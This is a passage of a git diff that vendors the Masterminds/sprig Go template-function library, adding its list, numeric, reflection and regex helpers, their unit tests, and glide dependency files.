+func TestClean(t *testing.T) {
+ assert.NoError(t, runt(`{{ clean "/foo/../foo/../bar" }}`, "/bar"))
+}
+
+func TestExt(t *testing.T) {
+ assert.NoError(t, runt(`{{ ext "/foo/bar/baz.txt" }}`, ".txt"))
+}
+
+func TestSnakeCase(t *testing.T) {
+ assert.NoError(t, runt(`{{ snakecase "FirstName" }}`, "first_name"))
+ assert.NoError(t, runt(`{{ snakecase "HTTPServer" }}`, "http_server"))
+ assert.NoError(t, runt(`{{ snakecase "NoHTTPS" }}`, "no_https"))
+ assert.NoError(t, runt(`{{ snakecase "GO_PATH" }}`, "go_path"))
+ assert.NoError(t, runt(`{{ snakecase "GO PATH" }}`, "go_path"))
+ assert.NoError(t, runt(`{{ snakecase "GO-PATH" }}`, "go_path"))
+}
+
+func TestCamelCase(t *testing.T) {
+ assert.NoError(t, runt(`{{ camelcase "http_server" }}`, "HttpServer"))
+ assert.NoError(t, runt(`{{ camelcase "_camel_case" }}`, "_CamelCase"))
+ assert.NoError(t, runt(`{{ camelcase "no_https" }}`, "NoHttps"))
+ assert.NoError(t, runt(`{{ camelcase "_complex__case_" }}`, "_Complex_Case_"))
+ assert.NoError(t, runt(`{{ camelcase "all" }}`, "All"))
+}
+
+func TestShuffle(t *testing.T) {
+ goutils.RANDOM = rand.New(rand.NewSource(1))
+ // Because we're using a random number generator, we need these to go in
+ // a predictable sequence:
+ assert.NoError(t, runt(`{{ shuffle "Hello World" }}`, "rldo HWlloe"))
+}
+
+// runt runs a template and checks that the output exactly matches the expected string.
+func runt(tpl, expect string) error {
+ return runtv(tpl, expect, map[string]string{})
+}
+
+// runtv takes a template, and expected return, and values for substitution.
+//
+// It runs the template and verifies that the output is an exact match.
+func runtv(tpl, expect string, vars interface{}) error {
+ fmap := TxtFuncMap()
+ t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+ var b bytes.Buffer
+ err := t.Execute(&b, vars)
+ if err != nil {
+ return err
+ }
+ if expect != b.String() {
+ return fmt.Errorf("Expected '%s', got '%s'", expect, b.String())
+ }
+ return nil
+}
+
+// runRaw runs a template with the given variables and returns the result.
+func runRaw(tpl string, vars interface{}) (string, error) {
+ fmap := TxtFuncMap()
+ t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+ var b bytes.Buffer
+ err := t.Execute(&b, vars)
+ if err != nil {
+ return "", err
+ }
+ return b.String(), nil
+}
diff --git a/vendor/github.com/Masterminds/sprig/glide.lock b/vendor/github.com/Masterminds/sprig/glide.lock
new file mode 100644
index 0000000000..34afeb9c37
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/glide.lock
@@ -0,0 +1,33 @@
+hash: 770b6a1132b743dadf6a0bb5fb8bf7083b1a5209f6d6c07826234ab2a97aade9
+updated: 2018-04-02T23:08:56.947456531+02:00
+imports:
+- name: github.com/aokoli/goutils
+ version: 9c37978a95bd5c709a15883b6242714ea6709e64
+- name: github.com/google/uuid
+ version: 064e2069ce9c359c118179501254f67d7d37ba24
+- name: github.com/huandu/xstrings
+ version: 3959339b333561bf62a38b424fd41517c2c90f40
+- name: github.com/imdario/mergo
+ version: 7fe0c75c13abdee74b09fcacef5ea1c6bba6a874
+- name: github.com/Masterminds/goutils
+ version: 3391d3790d23d03408670993e957e8f408993c34
+- name: github.com/Masterminds/semver
+ version: 59c29afe1a994eacb71c833025ca7acf874bb1da
+- name: github.com/stretchr/testify
+ version: e3a8ff8ce36581f87a15341206f205b1da467059
+ subpackages:
+ - assert
+- name: golang.org/x/crypto
+ version: d172538b2cfce0c13cee31e647d0367aa8cd2486
+ subpackages:
+ - pbkdf2
+ - scrypt
+testImports:
+- name: github.com/davecgh/go-spew
+ version: 5215b55f46b2b919f50a1df0eaa5886afe4e3b3d
+ subpackages:
+ - spew
+- name: github.com/pmezard/go-difflib
+ version: d8ed2627bdf02c080bf22230dbb337003b7aba2d
+ subpackages:
+ - difflib
diff --git a/vendor/github.com/Masterminds/sprig/glide.yaml b/vendor/github.com/Masterminds/sprig/glide.yaml
new file mode 100644
index 0000000000..772ba91344
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/glide.yaml
@@ -0,0 +1,15 @@
+package: github.com/Masterminds/sprig
+import:
+- package: github.com/Masterminds/goutils
+ version: ^1.0.0
+- package: github.com/google/uuid
+ version: ^0.2
+- package: golang.org/x/crypto
+ subpackages:
+ - scrypt
+- package: github.com/Masterminds/semver
+ version: v1.2.2
+- package: github.com/stretchr/testify
+- package: github.com/imdario/mergo
+ version: ~0.2.2
+- package: github.com/huandu/xstrings
diff --git a/vendor/github.com/Masterminds/sprig/list.go b/vendor/github.com/Masterminds/sprig/list.go
new file mode 100644
index 0000000000..1860549a94
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/list.go
@@ -0,0 +1,259 @@
+package sprig
+
+import (
+ "fmt"
+ "reflect"
+ "sort"
+)
+
+// Reflection is used in these functions so that slices and arrays of strings,
+// ints, and other types not implementing []interface{} can be worked with.
+// For example, this is useful if you need to work on the output of regexs.
+
+func list(v ...interface{}) []interface{} {
+ return v
+}
+
+func push(list interface{}, v interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ nl := make([]interface{}, l)
+ for i := 0; i < l; i++ {
+ nl[i] = l2.Index(i).Interface()
+ }
+
+ return append(nl, v)
+
+ default:
+ panic(fmt.Sprintf("Cannot push on type %s", tp))
+ }
+}
+
+func prepend(list interface{}, v interface{}) []interface{} {
+ //return append([]interface{}{v}, list...)
+
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ nl := make([]interface{}, l)
+ for i := 0; i < l; i++ {
+ nl[i] = l2.Index(i).Interface()
+ }
+
+ return append([]interface{}{v}, nl...)
+
+ default:
+ panic(fmt.Sprintf("Cannot prepend on type %s", tp))
+ }
+}
+
+func last(list interface{}) interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ return l2.Index(l - 1).Interface()
+ default:
+ panic(fmt.Sprintf("Cannot find last on type %s", tp))
+ }
+}
+
+func first(list interface{}) interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ return l2.Index(0).Interface()
+ default:
+ panic(fmt.Sprintf("Cannot find first on type %s", tp))
+ }
+}
+
+func rest(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ nl := make([]interface{}, l-1)
+ for i := 1; i < l; i++ {
+ nl[i-1] = l2.Index(i).Interface()
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot find rest on type %s", tp))
+ }
+}
+
+func initial(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ if l == 0 {
+ return nil
+ }
+
+ nl := make([]interface{}, l-1)
+ for i := 0; i < l-1; i++ {
+ nl[i] = l2.Index(i).Interface()
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot find initial on type %s", tp))
+ }
+}
+
+func sortAlpha(list interface{}) []string {
+ k := reflect.Indirect(reflect.ValueOf(list)).Kind()
+ switch k {
+ case reflect.Slice, reflect.Array:
+ a := strslice(list)
+ s := sort.StringSlice(a)
+ s.Sort()
+ return s
+ }
+ return []string{strval(list)}
+}
+
+func reverse(v interface{}) []interface{} {
+ tp := reflect.TypeOf(v).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(v)
+
+ l := l2.Len()
+ // We do not sort in place because the incoming array should not be altered.
+ nl := make([]interface{}, l)
+ for i := 0; i < l; i++ {
+ nl[l-i-1] = l2.Index(i).Interface()
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot find reverse on type %s", tp))
+ }
+}
+
+func compact(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ nl := []interface{}{}
+ var item interface{}
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if !empty(item) {
+ nl = append(nl, item)
+ }
+ }
+
+ return nl
+ default:
+ panic(fmt.Sprintf("Cannot compact on type %s", tp))
+ }
+}
+
+func uniq(list interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ dest := []interface{}{}
+ var item interface{}
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if !inList(dest, item) {
+ dest = append(dest, item)
+ }
+ }
+
+ return dest
+ default:
+ panic(fmt.Sprintf("Cannot find uniq on type %s", tp))
+ }
+}
+
+func inList(haystack []interface{}, needle interface{}) bool {
+ for _, h := range haystack {
+ if reflect.DeepEqual(needle, h) {
+ return true
+ }
+ }
+ return false
+}
+
+func without(list interface{}, omit ...interface{}) []interface{} {
+ tp := reflect.TypeOf(list).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(list)
+
+ l := l2.Len()
+ res := []interface{}{}
+ var item interface{}
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if !inList(omit, item) {
+ res = append(res, item)
+ }
+ }
+
+ return res
+ default:
+ panic(fmt.Sprintf("Cannot find without on type %s", tp))
+ }
+}
+
+func has(needle interface{}, haystack interface{}) bool {
+ tp := reflect.TypeOf(haystack).Kind()
+ switch tp {
+ case reflect.Slice, reflect.Array:
+ l2 := reflect.ValueOf(haystack)
+ var item interface{}
+ l := l2.Len()
+ for i := 0; i < l; i++ {
+ item = l2.Index(i).Interface()
+ if reflect.DeepEqual(needle, item) {
+ return true
+ }
+ }
+
+ return false
+ default:
+ panic(fmt.Sprintf("Cannot find has on type %s", tp))
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/list_test.go b/vendor/github.com/Masterminds/sprig/list_test.go
new file mode 100644
index 0000000000..fa4cc76e57
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/list_test.go
@@ -0,0 +1,157 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestTuple(t *testing.T) {
+ tpl := `{{$t := tuple 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}`
+ if err := runt(tpl, "foo1a"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestList(t *testing.T) {
+ tpl := `{{$t := list 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}`
+ if err := runt(tpl, "foo1a"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestPush(t *testing.T) {
+ // Named `append` in the function map
+ tests := map[string]string{
+ `{{ $t := tuple 1 2 3 }}{{ append $t 4 | len }}`: "4",
+ `{{ $t := tuple 1 2 3 4 }}{{ append $t 5 | join "-" }}`: "1-2-3-4-5",
+ `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ append $t "qux" | join "-" }}`: "foo-bar-baz-qux",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+func TestPrepend(t *testing.T) {
+ tests := map[string]string{
+ `{{ $t := tuple 1 2 3 }}{{ prepend $t 0 | len }}`: "4",
+ `{{ $t := tuple 1 2 3 4 }}{{ prepend $t 0 | join "-" }}`: "0-1-2-3-4",
+ `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ prepend $t "qux" | join "-" }}`: "qux-foo-bar-baz",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestFirst(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | first }}`: "1",
+ `{{ list | first }}`: "",
+ `{{ regexSplit "/src/" "foo/src/bar" -1 | first }}`: "foo",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+func TestLast(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | last }}`: "3",
+ `{{ list | last }}`: "",
+ `{{ regexSplit "/src/" "foo/src/bar" -1 | last }}`: "bar",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestInitial(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | initial | len }}`: "2",
+ `{{ list 1 2 3 | initial | last }}`: "2",
+ `{{ list 1 2 3 | initial | first }}`: "1",
+ `{{ list | initial }}`: "[]",
+ `{{ regexSplit "/" "foo/bar/baz" -1 | initial }}`: "[foo bar]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestRest(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | rest | len }}`: "2",
+ `{{ list 1 2 3 | rest | last }}`: "3",
+ `{{ list 1 2 3 | rest | first }}`: "2",
+ `{{ list | rest }}`: "[]",
+ `{{ regexSplit "/" "foo/bar/baz" -1 | rest }}`: "[bar baz]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestReverse(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | reverse | first }}`: "3",
+ `{{ list 1 2 3 | reverse | rest | first }}`: "2",
+ `{{ list 1 2 3 | reverse | last }}`: "1",
+ `{{ list 1 2 3 4 | reverse }}`: "[4 3 2 1]",
+ `{{ list 1 | reverse }}`: "[1]",
+ `{{ list | reverse }}`: "[]",
+ `{{ regexSplit "/" "foo/bar/baz" -1 | reverse }}`: "[baz bar foo]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestCompact(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 0 "" "hello" | compact }}`: `[1 hello]`,
+ `{{ list "" "" | compact }}`: `[]`,
+ `{{ list | compact }}`: `[]`,
+ `{{ regexSplit "/" "foo//bar" -1 | compact }}`: "[foo bar]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestUniq(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 4 | uniq }}`: `[1 2 3 4]`,
+ `{{ list "a" "b" "c" "d" | uniq }}`: `[a b c d]`,
+ `{{ list 1 1 1 1 2 2 2 2 | uniq }}`: `[1 2]`,
+ `{{ list "foo" 1 1 1 1 "foo" "foo" | uniq }}`: `[foo 1]`,
+ `{{ list | uniq }}`: `[]`,
+ `{{ regexSplit "/" "foo/foo/bar" -1 | uniq }}`: "[foo bar]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestWithout(t *testing.T) {
+ tests := map[string]string{
+ `{{ without (list 1 2 3 4) 1 }}`: `[2 3 4]`,
+ `{{ without (list "a" "b" "c" "d") "a" }}`: `[b c d]`,
+ `{{ without (list 1 1 1 1 2) 1 }}`: `[2]`,
+ `{{ without (list) 1 }}`: `[]`,
+ `{{ without (list 1 2 3) }}`: `[1 2 3]`,
+ `{{ without list }}`: `[]`,
+ `{{ without (regexSplit "/" "foo/bar/baz" -1 ) "foo" }}`: "[bar baz]",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestHas(t *testing.T) {
+ tests := map[string]string{
+ `{{ list 1 2 3 | has 1 }}`: `true`,
+ `{{ list 1 2 3 | has 4 }}`: `false`,
+ `{{ regexSplit "/" "foo/bar/baz" -1 | has "bar" }}`: `true`,
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/numeric.go b/vendor/github.com/Masterminds/sprig/numeric.go
new file mode 100644
index 0000000000..209c62e53a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/numeric.go
@@ -0,0 +1,159 @@
+package sprig
+
+import (
+ "math"
+ "reflect"
+ "strconv"
+)
+
+// toFloat64 converts 64-bit floats
+func toFloat64(v interface{}) float64 {
+ if str, ok := v.(string); ok {
+ iv, err := strconv.ParseFloat(str, 64)
+ if err != nil {
+ return 0
+ }
+ return iv
+ }
+
+ val := reflect.Indirect(reflect.ValueOf(v))
+ switch val.Kind() {
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return float64(val.Int())
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32:
+ return float64(val.Uint())
+ case reflect.Uint, reflect.Uint64:
+ return float64(val.Uint())
+ case reflect.Float32, reflect.Float64:
+ return val.Float()
+ case reflect.Bool:
+ if val.Bool() == true {
+ return 1
+ }
+ return 0
+ default:
+ return 0
+ }
+}
+
+func toInt(v interface{}) int {
+ //It's not optimal. Bud I don't want duplicate toInt64 code.
+ return int(toInt64(v))
+}
+
+// toInt64 converts integer types to 64-bit integers
+func toInt64(v interface{}) int64 {
+ if str, ok := v.(string); ok {
+ iv, err := strconv.ParseInt(str, 10, 64)
+ if err != nil {
+ return 0
+ }
+ return iv
+ }
+
+ val := reflect.Indirect(reflect.ValueOf(v))
+ switch val.Kind() {
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return val.Int()
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32:
+ return int64(val.Uint())
+ case reflect.Uint, reflect.Uint64:
+ tv := val.Uint()
+ if tv <= math.MaxInt64 {
+ return int64(tv)
+ }
+ // TODO: What is the sensible thing to do here?
+ return math.MaxInt64
+ case reflect.Float32, reflect.Float64:
+ return int64(val.Float())
+ case reflect.Bool:
+ if val.Bool() == true {
+ return 1
+ }
+ return 0
+ default:
+ return 0
+ }
+}
+
+func max(a interface{}, i ...interface{}) int64 {
+ aa := toInt64(a)
+ for _, b := range i {
+ bb := toInt64(b)
+ if bb > aa {
+ aa = bb
+ }
+ }
+ return aa
+}
+
+func min(a interface{}, i ...interface{}) int64 {
+ aa := toInt64(a)
+ for _, b := range i {
+ bb := toInt64(b)
+ if bb < aa {
+ aa = bb
+ }
+ }
+ return aa
+}
+
+func until(count int) []int {
+ step := 1
+ if count < 0 {
+ step = -1
+ }
+ return untilStep(0, count, step)
+}
+
+func untilStep(start, stop, step int) []int {
+ v := []int{}
+
+ if stop < start {
+ if step >= 0 {
+ return v
+ }
+ for i := start; i > stop; i += step {
+ v = append(v, i)
+ }
+ return v
+ }
+
+ if step <= 0 {
+ return v
+ }
+ for i := start; i < stop; i += step {
+ v = append(v, i)
+ }
+ return v
+}
+
+func floor(a interface{}) float64 {
+ aa := toFloat64(a)
+ return math.Floor(aa)
+}
+
+func ceil(a interface{}) float64 {
+ aa := toFloat64(a)
+ return math.Ceil(aa)
+}
+
+func round(a interface{}, p int, r_opt ...float64) float64 {
+ roundOn := .5
+ if len(r_opt) > 0 {
+ roundOn = r_opt[0]
+ }
+ val := toFloat64(a)
+ places := toFloat64(p)
+
+ var round float64
+ pow := math.Pow(10, places)
+ digit := pow * val
+ _, div := math.Modf(digit)
+ if div >= roundOn {
+ round = math.Ceil(digit)
+ } else {
+ round = math.Floor(digit)
+ }
+ return round / pow
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/numeric_test.go b/vendor/github.com/Masterminds/sprig/numeric_test.go
new file mode 100644
index 0000000000..2f41253052
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/numeric_test.go
@@ -0,0 +1,205 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestUntil(t *testing.T) {
+ tests := map[string]string{
+ `{{range $i, $e := until 5}}{{$i}}{{$e}}{{end}}`: "0011223344",
+ `{{range $i, $e := until -5}}{{$i}}{{$e}} {{end}}`: "00 1-1 2-2 3-3 4-4 ",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+func TestUntilStep(t *testing.T) {
+ tests := map[string]string{
+ `{{range $i, $e := untilStep 0 5 1}}{{$i}}{{$e}}{{end}}`: "0011223344",
+ `{{range $i, $e := untilStep 3 6 1}}{{$i}}{{$e}}{{end}}`: "031425",
+ `{{range $i, $e := untilStep 0 -10 -2}}{{$i}}{{$e}} {{end}}`: "00 1-2 2-4 3-6 4-8 ",
+ `{{range $i, $e := untilStep 3 0 1}}{{$i}}{{$e}}{{end}}`: "",
+ `{{range $i, $e := untilStep 3 99 0}}{{$i}}{{$e}}{{end}}`: "",
+ `{{range $i, $e := untilStep 3 99 -1}}{{$i}}{{$e}}{{end}}`: "",
+ `{{range $i, $e := untilStep 3 0 0}}{{$i}}{{$e}}{{end}}`: "",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+
+}
+func TestBiggest(t *testing.T) {
+ tpl := `{{ biggest 1 2 3 345 5 6 7}}`
+ if err := runt(tpl, `345`); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ max 345}}`
+ if err := runt(tpl, `345`); err != nil {
+ t.Error(err)
+ }
+}
+func TestMin(t *testing.T) {
+ tpl := `{{ min 1 2 3 345 5 6 7}}`
+ if err := runt(tpl, `1`); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ min 345}}`
+ if err := runt(tpl, `345`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToFloat64(t *testing.T) {
+ target := float64(102)
+ if target != toFloat64(int8(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int32(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64("102") {
+ t.Errorf("Expected 102")
+ }
+ if 0 != toFloat64("frankie") {
+ t.Errorf("Expected 0")
+ }
+ if target != toFloat64(uint16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(uint64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if 102.1234 != toFloat64(float64(102.1234)) {
+ t.Errorf("Expected 102.1234")
+ }
+ if 1 != toFloat64(true) {
+ t.Errorf("Expected 102")
+ }
+}
+func TestToInt64(t *testing.T) {
+ target := int64(102)
+ if target != toInt64(int8(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int32(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64("102") {
+ t.Errorf("Expected 102")
+ }
+ if 0 != toInt64("frankie") {
+ t.Errorf("Expected 0")
+ }
+ if target != toInt64(uint16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(uint64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(float64(102.1234)) {
+ t.Errorf("Expected 102")
+ }
+ if 1 != toInt64(true) {
+ t.Errorf("Expected 102")
+ }
+}
+
+func TestToInt(t *testing.T) {
+ target := int(102)
+ if target != toInt(int8(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int32(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt("102") {
+ t.Errorf("Expected 102")
+ }
+ if 0 != toInt("frankie") {
+ t.Errorf("Expected 0")
+ }
+ if target != toInt(uint16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(uint64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(float64(102.1234)) {
+ t.Errorf("Expected 102")
+ }
+ if 1 != toInt(true) {
+ t.Errorf("Expected 102")
+ }
+}
+
+func TestAdd(t *testing.T) {
+ tpl := `{{ 3 | add 1 2}}`
+ if err := runt(tpl, `6`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestMul(t *testing.T) {
+ tpl := `{{ 1 | mul "2" 3 "4"}}`
+ if err := runt(tpl, `24`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestCeil(t *testing.T){
+ assert.Equal(t, 123.0, ceil(123))
+ assert.Equal(t, 123.0, ceil("123"))
+ assert.Equal(t, 124.0, ceil(123.01))
+ assert.Equal(t, 124.0, ceil("123.01"))
+}
+
+func TestFloor(t *testing.T){
+ assert.Equal(t, 123.0, floor(123))
+ assert.Equal(t, 123.0, floor("123"))
+ assert.Equal(t, 123.0, floor(123.9999))
+ assert.Equal(t, 123.0, floor("123.9999"))
+}
+
+func TestRound(t *testing.T){
+ assert.Equal(t, 123.556, round(123.5555, 3))
+ assert.Equal(t, 123.556, round("123.55555", 3))
+ assert.Equal(t, 124.0, round(123.500001, 0))
+ assert.Equal(t, 123.0, round(123.49999999, 0))
+ assert.Equal(t, 123.23, round(123.2329999, 2, .3))
+ assert.Equal(t, 123.24, round(123.233, 2, .3))
+}
diff --git a/vendor/github.com/Masterminds/sprig/reflect.go b/vendor/github.com/Masterminds/sprig/reflect.go
new file mode 100644
index 0000000000..8a65c132f0
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/reflect.go
@@ -0,0 +1,28 @@
+package sprig
+
+import (
+ "fmt"
+ "reflect"
+)
+
+// typeIs returns true if the src is the type named in target.
+func typeIs(target string, src interface{}) bool {
+ return target == typeOf(src)
+}
+
+func typeIsLike(target string, src interface{}) bool {
+ t := typeOf(src)
+ return target == t || "*"+target == t
+}
+
+func typeOf(src interface{}) string {
+ return fmt.Sprintf("%T", src)
+}
+
+func kindIs(target string, src interface{}) bool {
+ return target == kindOf(src)
+}
+
+func kindOf(src interface{}) string {
+ return reflect.ValueOf(src).Kind().String()
+}
diff --git a/vendor/github.com/Masterminds/sprig/reflect_test.go b/vendor/github.com/Masterminds/sprig/reflect_test.go
new file mode 100644
index 0000000000..515fae9c4f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/reflect_test.go
@@ -0,0 +1,73 @@
+package sprig
+
+import (
+ "testing"
+)
+
+type fixtureTO struct {
+ Name, Value string
+}
+
+func TestTypeOf(t *testing.T) {
+ f := &fixtureTO{"hello", "world"}
+ tpl := `{{typeOf .}}`
+ if err := runtv(tpl, "*sprig.fixtureTO", f); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestKindOf(t *testing.T) {
+ tpl := `{{kindOf .}}`
+
+ f := fixtureTO{"hello", "world"}
+ if err := runtv(tpl, "struct", f); err != nil {
+ t.Error(err)
+ }
+
+ f2 := []string{"hello"}
+ if err := runtv(tpl, "slice", f2); err != nil {
+ t.Error(err)
+ }
+
+ var f3 *fixtureTO = nil
+ if err := runtv(tpl, "ptr", f3); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestTypeIs(t *testing.T) {
+ f := &fixtureTO{"hello", "world"}
+ tpl := `{{if typeIs "*sprig.fixtureTO" .}}t{{else}}f{{end}}`
+ if err := runtv(tpl, "t", f); err != nil {
+ t.Error(err)
+ }
+
+ f2 := "hello"
+ if err := runtv(tpl, "f", f2); err != nil {
+ t.Error(err)
+ }
+}
+func TestTypeIsLike(t *testing.T) {
+ f := "foo"
+ tpl := `{{if typeIsLike "string" .}}t{{else}}f{{end}}`
+ if err := runtv(tpl, "t", f); err != nil {
+ t.Error(err)
+ }
+
+ // Now make a pointer. Should still match.
+ f2 := &f
+ if err := runtv(tpl, "t", f2); err != nil {
+ t.Error(err)
+ }
+}
+func TestKindIs(t *testing.T) {
+ f := &fixtureTO{"hello", "world"}
+ tpl := `{{if kindIs "ptr" .}}t{{else}}f{{end}}`
+ if err := runtv(tpl, "t", f); err != nil {
+ t.Error(err)
+ }
+ f2 := "hello"
+ if err := runtv(tpl, "f", f2); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/regex.go b/vendor/github.com/Masterminds/sprig/regex.go
new file mode 100644
index 0000000000..9fe033a6bd
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/regex.go
@@ -0,0 +1,35 @@
+package sprig
+
+import (
+ "regexp"
+)
+
+func regexMatch(regex string, s string) bool {
+ match, _ := regexp.MatchString(regex, s)
+ return match
+}
+
+func regexFindAll(regex string, s string, n int) []string {
+ r := regexp.MustCompile(regex)
+ return r.FindAllString(s, n)
+}
+
+func regexFind(regex string, s string) string {
+ r := regexp.MustCompile(regex)
+ return r.FindString(s)
+}
+
+func regexReplaceAll(regex string, s string, repl string) string {
+ r := regexp.MustCompile(regex)
+ return r.ReplaceAllString(s, repl)
+}
+
+func regexReplaceAllLiteral(regex string, s string, repl string) string {
+ r := regexp.MustCompile(regex)
+ return r.ReplaceAllLiteralString(s, repl)
+}
+
+func regexSplit(regex string, s string, n int) []string {
+ r := regexp.MustCompile(regex)
+ return r.Split(s, n)
+}
